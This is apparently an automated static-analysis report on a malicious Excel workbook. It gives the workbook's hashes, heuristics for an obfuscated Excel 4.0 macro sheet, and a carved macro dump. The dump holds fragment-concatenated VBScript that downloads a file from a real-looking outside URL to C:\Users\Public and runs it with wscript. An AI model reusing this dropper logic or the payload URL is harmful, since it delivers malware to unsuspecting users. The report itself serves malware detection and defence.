Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 c25ca0a5aa7db100…

MALICIOUS

Office (OOXML) / .XLSX

381.3 KB Created: 2025-07-14 03:05:35 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2026-05-13
MD5: 6289c090fabb33d794ee644772b762cf SHA-1: bb21be8d1e5d6dd328b9e010e1e13f39411779eb SHA-256: c25ca0a5aa7db10075a392d2bcff13ed8dbc6ddbf01b5f78e40422251921c33c
182 Risk Score

Heuristics 4

  • Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
  • XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOAD
    An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
  • URL reconstructed from XLM cell array (1 URL) critical OOXML_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order plus FORMULA cell-reference concatenation in token order.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://astaoffices.com/am/amteruth.vbs Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image3.emf 38932 bytes
SHA-256: 54900bf09168b2eab2b0340f9ddd2245a14a0867bfd12768887a3fc4a7a45b73
xlm_sheet_00.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.bin 2943 bytes
SHA-256: 249bfb8ce39d6c8c23df5111f52ff1d172120cb8bdb0c28501c8c3f76447b023
Preview script
First 1,000 lines of the extracted script
�  �  �   @      ��������    �      .   h   o   �  �  �         �   @   d           � $                                    �  �  �  ����        �  <     �             �  �                     h   h   
Sh          @          k f u    C :    \ U s e     r s \ P u b     l i c \  B X                        h   h   
Hh          5          f i l C     
 m w k d v 4 . v b s     B � B X                        h   h    Fh          3   C       O n   E r r o r   R e s u m e   N e x t A�                        h   h    @h          -   C       k g o 7 y i   =   " m i c r O s " A�                        h   h    :h          '   C       k 0 a 3 3 3   =   " a D o " A�                        h   h    @h          -   C       g f 4 m r h   =   " d b . s T r " A�                        h   h    Hh          5   C       m a x l 0 1   =   " o f t . x    m l h "  A�                        h   h    @h          -   C     
 t p 1 c v u   =   " D    o�    "  A�                        h   o    � h          �   C     > d i m   q j h k y w :   S e t   q j h k y w   =   c r e a t e o b j e c t ( k 0 a 3 3 3   &   g f 4 m r h   &   " e a m " ) A�       o             !                h   o    � h          �   C     > d i m   e h p q k k :   S e t   e h p q k k   =   c r e a t e o b j e c t ( k g o 7 y i   &   m a x l 0 1   &   " T T P " ) A�       "                h   o    ^h          K   C       e h p q k k . O p e n   " G E T " ,   t p 1 c v u ,   F a l s e A�       #                h   o    4h          !   C       e h p q k k . S e n d A�       $                h   o    4h          !   C       w i t h   q j h k y w A�       %                h   o    8h          %   C     
         . t y p e   =   1 A�       &                h   o    0h              C     	         . o p e n A�       '                h   o    Zh          G   C               . w r i t e   e h p q k k . r e s p o n s e B o d y A�       (                h   o    lh          Y   C     
         . s a v e t o f i    l e   "  C        m s e x c e l . v b s " ,   2  A�       )                h   o    .h              C       e n d   w i t h A�       *                h   o    � h          �   C       G e t O  3 b j e c t ( " n e w : 1 3 7 0 9 6 2 0 - C 2 7 9 - 1 1 C E - A 4 9 E - 4 4 4 5 5 3 5 4 0 0 0 0 " ) . O     p     e n ( "  C      
 m s e x c e l . v b s " )  A�       +                h   o    0h              C     	 E r r . C l e a r A�       ,                h   o     h              C    A�       -                h   o    Ph          =      w s    c r i p t    C        m w k d v 4 . v     b s  B n       .                h   o   
 h              B 6     �  � � ��                                                                  @   �< �^I�n��! � ꨡ�� ���h�1m�:��rd�� � _J���Tަ���L.m��ߒԼ� �    �4� � �s�X � F�D    S H A - 5 1 2 � B                                                                  �    � 0ffffff�?ffffff�?      �?      �?333333�?333333�?�

Open this report in the interactive analyzer, or submit your own file for analysis.